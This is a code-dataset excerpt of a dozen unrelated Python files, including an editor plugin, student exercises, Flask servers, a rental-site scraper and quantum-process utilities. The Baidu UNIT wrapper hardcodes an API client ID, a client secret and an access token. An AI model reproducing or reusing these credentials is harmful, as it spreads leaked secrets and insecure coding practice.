Tab\n\nPlugin for Sublime Text to shift a tab left or right\n\nCopyright (c) 2015 Wendell Noordhof\n\nInspired by Move Tab by Frédéric Massart - FMCorz.net\nhttp://github.com/FMCorz/MoveTab\n\"\"\"\n\nimport sublime, sublime_plugin\n\nclass ShiftTabCommand(sublime_plugin.WindowCommand):\n\tdef run(self, direction):\n\t\tview = self.window.active_view()\n\t\tcurrent_pos = self.window.get_view_index(view)\n\t\tif current_pos == -1:\n\t\t\treturn\n\t\tgroup, index = current_pos\n\n\t\tif direction == \"left\":\n\t\t\tindex = index - 1\n\t\telif direction == \"right\":\n\t\t\tindex = index + 1\n\t\telse:\n\t\t\tprint(\"%s: Invalid direction: '%s'\" % (self.__class__.__name__, direction))\n\t\t\treturn\n\n\t\tif index < 0:\n\t\t\tif group > 0:\n\t\t\t\tgroup, index = group-1, len(self.window.views_in_group(group-1))\n\t\t\telse:\n\t\t\t\treturn\n\t\telif index > len(self.window.views_in_group(group)) - 1:\n\t\t\tif group < self.window.num_groups() - 1:\n\t\t\t\tgroup, index = group+1, 0\n\t\t\telse:\n\t\t\t\treturn\n\n\t\tself.window.set_view_index(view, group, index)\n\t\tself.window.focus_view(view)\n","sub_path":"shift_tab.py","file_name":"shift_tab.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"256476348","text":"def gcd(p, q):\n while p and q:\n p, q = q, p%q\n return p + q\n\nn = int(input())\nfor i in range(n):\n p = round(10000*float(input()))\n q = 10000\n print(q//gcd(p, q))\n","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"176387921","text":"# For team submissions:\n# By submitting this assignment, all team members agree to the following:\n# “Aggies do not lie, cheat, or steal, or tolerate those who do”\n# “I have not given or received any unauthorized aid on this assignment”\n#\n# Names: NAME OF TEAM MEMBER 1\n# NAME OF TEAM MEMBER 2\n# NAME OF TEAM MEMBER 3\n# NAME OF TEAM MEMBER 4\n# Course/Section: ENGR 102-216\n# Assignment: THE ASSIGNMENT NUMBER\n# Date: DAY MONTH YEAR\n\ninp = open('Celsius.dat', 'r')\nout = open(\"Fahrenheit.dat\", 'w')\nx = inp.read()\n\nfor i in x.split('\\n'):\n if i.isnumeric():\n f = (float(i) * 9 / 5) + 32\n out.write(str(f) + '\\n')\n\ninp.close()\nout.close()\n\n","sub_path":"Week 9/Lab9_Act1.py","file_name":"Lab9_Act1.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"236880244","text":"with open('surfin.txt') as file:\n rows, cols = (int(i) for i in file.readline().split())\n crowd = [i.strip() for i in file]\n\n\ndef step(coords):\n xPos, yPos = coords\n if yPos - 1 >= 0:\n if crowd[xPos][yPos - 1] == '>':\n yield [xPos, yPos - 1]\n if xPos - 1 >= 0:\n if crowd[xPos - 1][yPos] == 'v':\n yield [xPos - 1, yPos]\n\nanswer = 0\nqueue = [[rows - 1, cols - 1]]\nwhile queue:\n for i in step(queue.pop()):\n queue.append(i)\n answer += 1\n\nanswer = rows * cols - (answer + 1)\nwith open('surfout.txt', 'w') as file:\n file.write(str(answer))\n","sub_path":"AIOC/AIC&AIO/2008/Crowd Surfing/crowd.py","file_name":"crowd.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"638153418","text":"import ast\nfrom django.conf import settings\nfrom notifier.event_handler.event import Event\n\n\nclass ETLJobsLinksEvent(Event):\n def __init__(self, job_notifier, request_id, etl_jobs):\n self.job_notifier = job_notifier\n self.request_id = request_id\n self.etl_jobs = etl_jobs\n\n @classmethod\n def get_type(cls):\n return \"ETLJobsLinksEvent\"\n\n @classmethod\n def get_method(cls):\n return \"process_etl_jobs_links_event\"\n\n def translate_status(self, code=None, message=\"\"):\n if code:\n if code == 101:\n return \"DATA_SOURCE_ERROR\"\n elif code == 102:\n return \"NO_DATA\"\n elif code == 103:\n return \"ERROR\"\n return message\n\n def get_message(self, message):\n try:\n return message.get(\"message\")\n except Exception as e:\n pass\n return message\n\n def __str__(self):\n ETL_COMMENT_MESSAGE_TEMPLATE = \"\"\"\n ETLJobs:\n | TYPE | SAMPLE ID | STATUS | MESSAGE |\n {etl_jobs}\n \"\"\"\n etl_jobs = \"\"\n for j in self.etl_jobs:\n etl_jobs += \"| %s | %s | %s | %s |\\n\" % (\n j[\"type\"],\n j[\"sample\"],\n self.translate_status(code=j[\"code\"], message=j[\"status\"]),\n j[\"message\"],\n )\n return ETL_COMMENT_MESSAGE_TEMPLATE.format(etl_jobs=etl_jobs)\n","sub_path":"notifier/events/etl_jobs_links_event.py","file_name":"etl_jobs_links_event.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"559205945","text":"# coding:utf-8\r\n'''\r\nCreated on 2017年7月15日\r\n\r\n@author: Administrator\r\n'''\r\nfrom utils.http_request import HttpRequest\r\nimport json\r\n\r\n\r\nclass BaiduUnit(object):\r\n '''\r\n 百度UNIT请求封装\r\n '''\r\n\r\n def __init__(self):\r\n '''\r\n Constructor\r\n '''\r\n # token获取(使用应用名称为:“商品导购”)\r\n self.token_request = HttpRequest(\"https://aip.baidubce.com/oauth/2.0/token\")\r\n self.key_grant_type = \"grant_type\"\r\n self.val_grant_type = \"client_credentials\";\r\n self.key_client_id = \"client_id\"\r\n self.val_client_id = \"CwMUqtG0PlTtwExfLbeBr7qV\"\r\n self.key_client_secret = \"client_secret\"\r\n self.val_client_secret = \"kZiWVLLjkXo3DOSB8nEglsjgmmyaLFOr\"\r\n\r\n # token(30th-September-2017)\r\n self.val_token = \"24.e79e25f689fabcc17f3ed51cac325407.2592000.1509334723.282335-10028417\"\r\n\r\n self.unit_requet = HttpRequest(\r\n \"https://aip.baidubce.com/rpc/2.0/solution/v1/unit_utterance?access_token=\" + self.val_token)\r\n\r\n def get_token(self):\r\n '''\r\n 获取临时token\r\n '''\r\n data = {self.key_grant_type: self.val_grant_type, \\\r\n self.key_client_id: self.val_client_id, \\\r\n self.key_client_secret: self.val_client_secret}\r\n res = self.token_request.get(params=data).text\r\n res_dic = json.loads(res)\r\n if (res_dic.has_key(\"access_token\")):\r\n return res_dic[\"access_token\"]\r\n else:\r\n return None\r\n\r\n def query_request(self, scene_id, query, session_id):\r\n '''\r\n 用户query请求\r\n scene_id:场景ID\r\n query:用户query\r\n session_id:session ID\r\n 返回值:UNIT返回结果\r\n '''\r\n data = {\"scene_id\": scene_id, \\\r\n \"query\": query, \\\r\n \"session_id\": session_id}\r\n\r\n return self.unit_requet.post(json.dumps(data))\r\n","sub_path":"src/baiduunit/baidu_unit.py","file_name":"baidu_unit.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"310140070","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 15 10:10:57 2018\n\n@author: Jarnd\n\"\"\"\n\n\"\"\"\nCreated on Tue Oct 9 16:35:42 2018\n\n@author: Jarnd\n\"\"\"\nimport numpy as np\nimport itertools as itt\nfrom functools import reduce\nimport operator as op\n\n#%%\nsq2 = np.sqrt(2)\n\nI = np.mat([[1, 0], [0, 1]],dtype='complex')\nX = np.mat([[0, 1], [1, 0]],dtype='complex')\nY = 1j*np.mat([[0, -1], [1, 0]],dtype='complex')\nZ = np.mat([[1, 0], [0, -1]],dtype='complex')\nII = np.kron(I,I)\n\npaulis_1 = [I,X,Y,Z]\n\n\n#%%\ndef get_pauli_basis(n, normalise=True):\n \"\"\"\n Lists the Pauli matrices that form a basis for the space of\n operators on `n` qubits.\n \"\"\"\n basis = [_ / sq2 for _ in paulis_1] if normalise else paulis_1\n \n P2 = []\n for Bde in itt.product(basis, repeat=n):\n P2.append(reduce(np.kron, Bde))\n return P2\n\ndef get_pauli_names(n):\n p1names = ['I', 'X', 'Y', 'Z']\n pnames = []\n for p in itt.product(p1names, repeat=n):\n pnames.append(reduce(op.add, p))\n return pnames\n\ndef get_decomp(U,bas,n):\n \"\"\"\n Get the decomposition of unitary U into a basis specified by bas\n Returns a string of length 2^(2n) with the ith entry the weight of the ith matrix in bas\n \"\"\"\n weights = np.zeros(len(bas),dtype = 'complex')\n for i,mat in enumerate(bas):\n weights[i] = np.trace(mat.conj().T*U)/np.trace(mat.conj().T*mat)\n return np.mat(weights)\n\ndef get_paulidecomp(U,n,normalisation = False):\n \"\"\"\n Get the decomposition of unitary U into the pauli basis.\n Returns a string of length 2^(2n) with the ith entry the weight of the ith pauli\n \"\"\"\n P = get_pauli_basis(n, normalise = normalisation)\n weights = np.zeros(len(P),dtype = 'complex')\n for i,pauli in enumerate(P):\n weights[i] = np.trace(pauli*U)/np.trace(pauli*pauli)\n return np.mat(weights)\n\ndef U_to_chi(U,n, normalisation):\n weights = get_paulidecomp(U,n, normalisation)\n return np.matmul(weights.conj().T, weights)\n\ndef get_chi_dep(p,n, normalized=False):\n d4 = 2**(2*n)\n supp = np.ones(d4,dtype='complex')*p*(1/(d4-1))\n supp[0] = 1-p\n return np.mat(np.diag(supp))*(2**n) if normalized else np.mat(np.diag(supp))\n\ndef left_ext_chi(chi,n,bas=None, normalise = False):\n if bas == None:\n bas = get_pauli_basis(1,normalise)\n I = np.eye(2**1)\n weights = get_decomp(I,bas,1)\n chi_I = np.matmul(weights.T, weights)\n return np.kron(chi_I,chi)\n\ndef right_ext_chi(chi,n,bas=None,normalise = False):\n if bas == None:\n bas = get_pauli_basis(1,normalise)\n I = np.eye(2**1)\n weights = get_decomp(I,bas,1)\n chi_I = np.matmul(weights.T, weights)\n return np.kron(chi,chi_I)\n\ndef get_supersuper_from_chi(chi,bas,n):\n SS = np.zeros((2**(2*n),2**(2*n)),dtype = 'complex')\n for Bm, Bn in itt.product(enumerate(bas),repeat = 2):\n SS += np.kron(chi[Bm[0],Bn[0]],np.kron(Bn[1].conj(),Bm[1]))\n return np.mat(SS)\n\ndef get_chi_from_supersuper(SS,bas,n):\n chi = np.zeros((2**(2*n),2**(2*n)),dtype = 'complex')\n for Bm, Bn in itt.product(enumerate(bas),repeat = 2):\n basvect = np.kron(Bn[1].T,Bm[1].conj().T)\n chi[Bm[0],Bn[0]] = np.trace(basvect*SS)/np.trace(basvect*basvect.conj().T)\n return np.mat(chi*(2**n)/(np.trace(chi)*np.trace(np.matmul(bas[0].conj().T,bas[0]))))\n\ndef get_chi_from_chis(chi_list, bas, n, normalisation):\n S = get_supersuper_from_chi(chi_list[0],bas,n)\n for chi in chi_list[1:]:\n S = get_supersuper_from_chi(chi,bas,n)*S\n return get_chi_from_supersuper(S, bas, n)\n\ndef get_chi_error(chi, chi_bas, U, mode='p'):\n chi = np.mat(chi)\n U = np.mat(U)\n V = np.mat(np.zeros((len(chi_bas), len(chi_bas))), dtype='complex')\n mc = 0\n for i in range(len(chi_bas)):\n chi_bas[i] = np.mat(chi_bas[i])\n for m in chi_bas:\n nc = 0\n for n in chi_bas:\n if mode == 'p':\n V[mc, nc] = np.trace(m.H @ n @ U.H)\n if mode == 'n':\n V[mc, nc] = np.trace(m.H @ U.H @ n)\n nc += 1\n mc += 1\n return V @ chi @ V.H\n\ndef index(indices):\n indices.reverse()\n ind = 0\n for i in range(len(indices)):\n ind += indices[i]*(4**i)\n return ind\n\ndef swap_qubits_chi(chi,q1,q2,n):\n Perm = np.zeros_like(chi)\n for indices in itt.product(range(4),repeat = n):\n indices = list(indices)\n indicesnew = indices.copy()\n ind1 = index(indices)\n indicesnew[q2] = indices[q1]\n indicesnew[q1] = indices[q2]\n ind2 = index(indices)\n Perm[ind1,ind2] = 1\n Perm[ind2,ind1] = 1\n return Perm\n\ndef get_trace_S(n):\n Tr = np.zeros((2**(2*(n-1)),2**(2*n)),dtype = 'complex')\n Iten = 1\n for i in range(n-1):\n Iten = np.kron(Iten, I)\n for i in [0,1]:\n k = np.zeros((1,2),dtype = 'complex')\n k[0,i] = 1\n bas = np.kron(Iten,k)\n Tr += np.kron(bas,bas)\n return Tr\n\n#def chi_trace_q(chi,n,q):\n# nontrace = list(range(n))\n# nontrace.remove(q)\n# dtraced = 2**(2*(n-1))\n# chi_traced = np.zeros((dtraced,dtraced))\n# for m in itt.product(range(4),repeat = (n-1)):\n# for n in itt.product(range(4), repeat = (n-1)):\n# \ndef chi3_trace_3(chi):\n chi_traced = np.zeros((16,16),dtype='complex')\n for m in itt.product(range(4),repeat = 2):\n mtraced = 4*m[0]+m[1]\n mold = 16*m[0]+4*m[1]\n for n in itt.product(range(4), repeat = 2):\n ntraced = 4*n[0]+n[1]\n nold = 16*n[0]+4*n[1]\n chi_traced[mtraced,ntraced] = chi[mold,nold]\n return chi_traced/np.trace(chi_traced)\n \n\n#%%\nnormalisation = False\n\nP1 = get_pauli_basis(1,normalise = normalisation)\nP2 = get_pauli_basis(2,normalise = normalisation)\nP3 = get_pauli_basis(3,normalise = normalisation)\n\nP2norm = get_pauli_basis(2, normalise = True)\nP3norm = get_pauli_basis(3, normalise = True)\n\nH = (1/sq2)*(X+Z)\n\nHI = np.kron(H,I)\nIH = np.kron(I,H)\nHH = HI * IH\n\nCX = np.mat([[1, 0, 0, 0],[0, 1, 0, 0],[0, 0, 0, 1],[0, 0, 1, 0]])\nSWAP = np.mat([[1, 0, 0, 0],[0, 0, 1, 0],[0, 1, 0, 0],[0, 0, 0, 1]])\nSWAPI = np.kron(SWAP,I)\n\nICX = np.kron(I,CX)\nCXI = np.kron(CX,I)\n\nISWAP = np.kron(I,SWAP)\nCIX = CXI * ISWAP\n\n\nc1_H = U_to_chi(H,1, normalisation)\nc2_HI = U_to_chi(HI,2, normalisation)\nc2_IH = U_to_chi(IH,2, normalisation)\n\n\nc2_SWAP = U_to_chi(SWAP, 2, normalisation)\nc2_CX = U_to_chi(CX, 2, normalisation)\n\nc3_HII = right_ext_chi(c2_HI,2)\nc3_IHI = right_ext_chi(c2_IH,2)\nc3_IIH = left_ext_chi(c2_IH,2)\nc3_SWAPI = right_ext_chi(c2_SWAP,2)\nc3_CXI = right_ext_chi(c2_CX,2)\nc3_ICX = left_ext_chi(c2_CX,2)\n\n\n\nS2_HI = get_supersuper_from_chi(c2_HI, P2,2)\nS2_IH = get_supersuper_from_chi(c2_IH, P2,2)\nS2_CX = get_supersuper_from_chi(c2_CX, P2,2)\n\nS3_SWAPI = get_supersuper_from_chi(c3_SWAPI, P3, 3)\nS3_HII = get_supersuper_from_chi(c3_HII, P3, 3)\nS3_IHI = get_supersuper_from_chi(c3_IHI, P3, 3)\nS3_IIH = get_supersuper_from_chi(c3_IIH, P3, 3)\n\nS3_CXI = get_supersuper_from_chi(c3_CXI, P3, 3)\nS3_ICX = get_supersuper_from_chi(c3_ICX, P3, 3)\nS3_CIX = S3_SWAPI @ S3_ICX @ S3_SWAPI\n","sub_path":"Functions/Simpleerrorfunc.py","file_name":"Simpleerrorfunc.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"292066985","text":"from tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom time import strftime\r\n\r\n# clock user interface\r\nUI = Tk()\r\nUI.title(\"Digital Clock\")\r\n\r\n\r\n# defining the time format\r\ndef time():\r\n time_format = strftime(\"%H: %M: %S %p\")\r\n label.config(text=time_format)\r\n label.after(1000, time)\r\n\r\n\r\n# variable to contain the clock\r\nlabel = Label(UI, font=(\"ds-digital\", 80), background=\"black\", foreground=\"cyan\")\r\nlabel.pack(anchor=\"center\")\r\ntime()\r\n\r\nmainloop()","sub_path":"Digital_Clock/digital_clock.py","file_name":"digital_clock.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"382256321","text":"from flask import Flask, request, json, make_response\nimport pandas as pd\nfrom flask_restful import reqparse\nfrom google.protobuf import json_format\n\nfrom static import dataCommunication_pb2\n\napp = Flask(__name__)\nRFW = \"jf3458rw-3rjdc134fr-a1eif03r52\"\nchunk_list = []\n\n\ndef getCol(value):\n v = value.lower()\n functions = {\n 'cpu': 1,\n 'networkin': 2,\n 'networkout': 3,\n 'memory': 4\n }\n return functions.get(v)\n\n\n@app.route('/v1/batches/json', methods=['POST'])\ndef receive_json_request():\n print(\"json request received\")\n parser = reqparse.RequestParser()\n parser.add_argument('branch', type=str)\n parser.add_argument('datasetType', type=str)\n # 一次取得数量,多少个bench也要根据这个来定\n parser.add_argument('workloadMetric', type=str)\n parser.add_argument('batchUnit', type=int)\n parser.add_argument('batchId', type=int)\n parser.add_argument('batchSize', type=int)\n parser.add_argument('RFWID', type=str)\n args = parser.parse_args()\n result = request_analy_json(args)\n return make_response(result, 200)\n\n\n\n\n@app.route('/v1/batches/proto', methods=['POST','GET'])\n# proto去解析\ndef receive_proto_request():\n print(\"receive proto request\")\n reqs = dataCommunication_pb2.Request()\n reqs.ParseFromString(request.get_data().replace(b'\\r\\n', b'\\n'))\n if rfw_check(reqs.RFW_ID) is False:\n return\n result = request_analy_proto(reqs)\n print(\"final result is :\",result)\n parsed_pb = json_format.Parse(result, dataCommunication_pb2.Response(), ignore_unknown_fields=False)\n return make_response(parsed_pb.SerializeToString(), 200)\n\n\ndef rfw_check(str):\n if str != RFW:\n return False\n return True\n\n\ndef request_analy_proto(reqs):\n return _getDataFrame(reqs)\n\n\ndef _getDataFrame(reqs):\n file_name = \"./static/\"\n type = reqs.branch\n if type.lower() == 'dell':\n file_name = '{}{}'.format(file_name,'NDBench-')\n else :\n file_name = '{}{}'.format(file_name,'DVD-')\n file_name = '{}{}{}'.format(file_name,reqs.dataset_type,'.csv')\n print('file name is: ',file_name)\n metric = reqs.workload_metric\n col_index = getCol(metric)\n batchSize = reqs.batch_size\n batchID = reqs. batch_id\n unit = reqs.batch_unit\n reader = pd.read_csv(file_name, usecols=[col_index], chunksize=unit, iterator=True)\n chunk_str = ''\n for chunk in reader:\n chunk_list.append(chunk)\n count = 0;\n last_batch_size = 0;\n while count < batchSize:\n count += 1\n next_str = chunk_list[batchID + count].to_json(orient=\"values\", force_ascii=False).replace('[', '').\\\n replace(']','')\n if count == batchSize-1:\n last_batch_size = chunk_list[batchID + count].shape[0]\n print(\"last batch size: \", last_batch_size)\n chunk_str = '{},{}'.format(chunk_str,next_str)\n new_str = chunk_str[1:]\n print(\"After Refactor: \", new_str)\n chunk_json = eval(new_str)\n return to_json_for_pb(batchSize,batchID + count-1, last_batch_size,metric, chunk_json)\n\ndef request_analy_json(args):\n if args.get('RFWID') != RFW:\n return\n file_name = \"./static/\"\n type = args.get('branch')\n metric = args.get('workloadMetric')\n col_index = getCol(metric)\n batchUnit = args.get('batchUnit')\n batchSize = args.get('batchSize')\n dataset_type = args.get('datasetType')\n batchID = args.get('batchId')\n if type.lower() == 'dell':\n print(\"request is dell dataset\")\n file_name = '{}{}'.format(file_name,'NDBench-')\n else :\n print(\"request is netflix dataset\")\n file_name = '{}{}'.format(file_name,'DVD-')\n file_name = '{}{}{}'.format(file_name,dataset_type,'.csv')\n print('file name is: ',file_name)\n reader = pd.read_csv(file_name, usecols=[col_index], chunksize=batchUnit,\n iterator=True)\n chunk_str = ''\n for chunk in reader:\n chunk_list.append(chunk)\n count = 0\n while count < batchSize:\n count += 1\n next_str = '[{}]'.format(chunk_list[batchID + count].to_json(orient=\"values\", force_ascii=False).replace('[', '').\\\n replace(']',''))\n print(\"Slice: \", next_str)\n chunk_str = '{},{}'.format(chunk_str,next_str)\n new_str = chunk_str[1:]\n if batchSize ==1:\n new_str = '[{}]'.format(new_str)\n print(\"After Refactor: \", new_str)\n chunk_json = eval(new_str)\n return to_json(batchID, metric, chunk_json)\n\n\n# {\n# \"SUCCESS\": \"SUCCESS\",\n# \"workload_data\": {\n# \"0\": [\n# [\n# 260661198\n# ],\n# [\n# 280470095\n# ],\n# [\n# 286492234\n# ],\n# [\n# 280274041\n# ],\n# [\n# 267113409\n# ]\n# ],\n# \"1\": [\n# [\n# 260661198\n# ],\n# [\n# 280470095\n# ],\n# [\n# 286492234\n# ],\n# [\n# 280274041\n# ],\n# [\n# 267113409\n# ]\n# ]\n# }\n# }\n\ndef to_json_for_pb(batchSize,batch_id, last_batch_size, metrics, chunk_str):\n before_json = {\n 'last_batch_ID': batch_id, 'batch_amount':batchSize,'last_batch_size': last_batch_size, 'RFW_ID': RFW, 'workload_metrics': metrics, 'workload_data': chunk_str\n }\n print('After Jsonify: ', json.dumps(before_json))\n return json.dumps(before_json)\n\ndef to_json(batch_id, metrics, chunk_str):\n before_json = {\n 'last_batch_ID': batch_id, 'RFW_ID': RFW, 'workload_metrics': metrics, 'workload_data': chunk_str\n }\n print('After Jsonify: ', json.dumps(before_json))\n # rr = {\"RFW_ID\": \"jf3458rw-3rjdc134fr-a1eif03r52\", \"last_batch_ID\": 1, \"workload_data\":\n # [\"239635160\", \"215437697\"], \"workload_metrics\": \"cpu\"}\n return json.dumps(before_json)\n\n\ndef after_request(resp):\n resp.headers['Access-Control-Allow-Origin'] = '*'\n return resp\n\n\napp.after_request(after_request)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"442944689","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nfrom collections import OrderedDict\nimport json\nimport requests\nimport sys\nimport argparse\nimport io\nimport pytesseract\nfrom PIL import Image\n\nheaders = {\n 'User-agent': 'Report abuse: me@frankchang.me',\n}\n\ndef fetch_info(link):\n return requests.get(link, headers=headers).text.encode('utf-8')\n\ndef parse_label_list(soup):\n labels = soup.select('ul.clearfix.labelList.labelList-1')[0]\n labellist = []\n\n for li in labels.select('li.clearfix'):\n for div in li.select('div.one'):\n key = div.getText().replace(u' ','')\n value = div.findNextSibling('div', {'class': 'two'}).em.getText()\n labellist.append((key, value))\n\n return OrderedDict(labellist)\n\ndef parse_facility(soup):\n facilities = []\n no_facilities = []\n\n #facilityList = soup.findChildren('ul', {'class': 'facility clearfix'})[0]\n facilityList = soup.select('ul.facility.clearfix')[0]\n for facility in facilityList.findChildren('li'):\n if 'no' in facility.span['class']:\n no_facilities.append(facility.getText())\n else:\n facilities.append(facility.getText())\n\n return (facilities, no_facilities)\n\ndef parse_photos(soup):\n imgEles = soup.select('div.imgList')[0].findChildren('img')\n imgUrlList = []\n for img in imgEles:\n imgUrlList.append(img['src'].replace('_125x85.crop.jpg', '_765x517.water3.jpg'))\n\n return imgUrlList\n\ndef parse_info(soup):\n info = OrderedDict()\n\n infoSection = soup.select('div.detailInfo.clearfix')[0]\n priceSec = infoSection.select('div.price.clearfix')[0]\n explainSec = infoSection.select('div.explain')[0]\n attrs = infoSection.select('ul.attr li')\n\n price = priceSec.i.getText().replace(u' ','').replace('\\xa0','').replace(u' ','')\n explain = explainSec.getText().replace(u' ', '').replace('\\xa0', '')\n info[u'租金'] = u\"{0} ({1})\".format(price, explain)\n\n for attr in attrs:\n info.update((tuple(attr.getText().replace(u' ', '').replace('\\xa0', '').split(':')),))\n\n return info\n\ndef parse_status(soup):\n return soup.select('div.houseIntro')[0].getText().replace(' ', ' ')\\\n .replace('
', '\\n').replace(' ', '').replace('\\xa0', '').replace('\\r\\n','\\n')\n\ndef parse_phone_number(soup):\n phoneImg = soup.select('span.num')\n if phoneImg[0].img:\n phoneImgUrl = phoneImg[0].img['src'].replace('//', 'https://')\n rep = requests.get(phoneImgUrl, headers=headers).content\n image = Image.open(io.BytesIO(rep))\n\n return pytesseract.image_to_string(image).replace(' ','')\n\n return None\n\ndef get_591_info(link):\n info = OrderedDict()\n\n raw = fetch_info(link)\n soup = BeautifulSoup(raw, 'html.parser')\n facility_info = parse_facility(soup)\n\n info[u'標題'] = soup.select('span.houseInfoTitle')[0].getText()\n info[u'地址'] = soup.select('span.addr')[0].getText()\n info[u'網址'] = link\n info[u'照片'] = parse_photos(soup)\n info[u'聯絡方式'] = parse_phone_number(soup)\n\n info.update(parse_info(soup))\n info[u'房東提供'] = facility_info[0]\n info[u'房東不提供'] = facility_info[1]\n info.update(parse_label_list(soup))\n info[u'屋況'] = parse_status(soup)\n\n return info\n \ndef main():\n parser = argparse.ArgumentParser(\n description='Fetch data from 591 and return a json string')\n parser.add_argument(\n 'url', metavar='url', nargs='+')\n\n args = parser.parse_args()\n info_list = []\n\n for link in args.url:\n info = get_591_info(link)\n info_list.append(info)\n\n if len(info_list) == 1:\n print(info_list[0])\n print(json.dumps(info_list[0], ensure_ascii=False, indent=4))\n else:\n print(json.dumps(info_list, ensure_ascii=False, indent=4))\n\nif __name__ == '__main__':\n main()\n","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"73892134","text":"__author__ = 'GitHub:Air-Zhuang'\n\nfrom flask import render_template, jsonify, request\nfrom flask_login import login_required, current_user\n\nfrom app.models.cart import Cart\nfrom app.view_models.cart_view_model import CartCollection\nfrom app.view_models.user_view_model import UserViewModel\nfrom . import web\nfrom app.models.base import db\nfrom app.models.goods import Goods\n\n\n@web.route('/cart/')\n@login_required\ndef cart(gid):\n resp_data = {'code': 200, 'msg': '查询成功~~', 'data': {}}\n addNav(resp_data)\n uid = current_user.id\n cart = Cart()\n goods = Goods()\n\n if gid != '0': # gid=0表示从nav跳转过来,不是0表示从详情页跳转过来,git>0表示添加一台,git<0表示减少一台\n abs_gid=abs(int(gid))\n num = cart.getNum(uid, abs_gid)\n goods_info = goods.getCartWantDict(abs_gid)\n if int(gid)>0:\n if num > 0: # 如果存在数量加1,不存在变成1\n total_price = cart.getTotalPrice(uid=uid, gid=gid) # 得到现在的总价\n with db.auto_commit():\n cart.query.filter_by(uid=uid, gid=gid).update({'num': num + 1, 'total_price': total_price + goods_info['price']})\n elif num == 0:\n with db.auto_commit():\n cart.gid = gid\n cart.uid = uid\n cart.num = 1\n cart.goods_name = goods_info['goods_name']\n cart.goods_img = goods_info['goods_img']\n cart.price = goods_info['price']\n cart.cpu = goods_info['cpu']\n cart.ram = goods_info['ram']\n cart.memory = goods_info['memory']\n cart.video_card = goods_info['video_card']\n cart.size = goods_info['size']\n cart.cate_company = goods_info['cate_company']\n cart.total_price = goods_info['price']\n db.session.add(cart)\n elif int(gid)<0:\n total_price = cart.getTotalPrice(uid=uid, gid=abs_gid)\n with db.auto_commit():\n cart.query.filter_by(uid=uid, gid=abs_gid).update({'num': num - 1, 'total_price': total_price - goods_info['price']})\n\n userAllCartList = cart.getUserAllCartList(uid)\n cartCollection = CartCollection(userAllCartList)\n resp_data['data'] = cartCollection.data\n return render_template('cart.html', data=resp_data)\n\n@web.route('/cart_delete/')\n@login_required\ndef cart_delete(gid):\n resp_data = {'code': 200, 'msg': '查询成功~~', 'data': {}}\n addNav(resp_data)\n uid = current_user.id\n cart = Cart()\n\n if gid==\"delete_all\":\n with db.auto_commit():\n cart.query.filter_by(uid=uid).delete()\n else:\n with db.auto_commit():\n cart.query.filter_by(uid=uid, gid=gid).delete()\n\n userAllCartList=cart.getUserAllCartList(uid)\n cartCollection=CartCollection(userAllCartList)\n resp_data['data']=cartCollection.data\n return render_template('cart.html', data=resp_data)\n\n\ndef addNav(resp_data):\n if current_user.is_active: # addUserInfo\n userviewmodel = UserViewModel(current_user)\n resp_data['user'] = userviewmodel.data\n companys = Goods.getDistinctCompany() # addCompanyList\n resp_data['companys'] = companys\n","sub_path":"app/web/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"15088782","text":"\"\"\"Agent Server Entrypoint.\"\"\"\n\n# Standard Library\nimport logging\n\n# Third Party\nfrom rpyc.utils.server import ThreadedServer\n\n# Project\nfrom rsagent.config import params\nfrom rsagent.services.main import Agent\n\nlogger = logging.getLogger(f\"{__package__}.{__name__}\")\n\n\nif __name__ == \"__main__\":\n server = ThreadedServer(\n Agent,\n hostname=str(params.listen_address),\n port=params.listen_port,\n ipv6=True,\n logger=logger,\n )\n server.start()\n","sub_path":"rsagent/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"302870181","text":"import pygame\nfrom pygame.sprite import Group\n\nfrom settings import Settings\nfrom ship import Ship\nfrom alien import Alien\nimport game_functions\ndef run_game():\n ai_settings=Settings()\n pygame.init()\n screen=pygame.display.set_mode((ai_settings.screen_width,ai_settings.screen_height))\n pygame.display.set_caption(\"Alien Invasion\")\n ship=Ship(screen,ai_settings)\n bullets=Group() \n aliens=Group()\n while True:\n game_functions.check_event(ai_settings,screen,ship,bullets)\n game_functions.update_screen(ai_settings,screen,ship,bullets,aliens)\n game_functions.update_bullet(bullets)\n pygame.display.flip()\n \n\nrun_game()","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"454315867","text":"import copy\nfrom ctapipe.utils import get_dataset_path\nfrom ctapipe.io.simteleventsource import SimTelEventSource\n\ndataset = 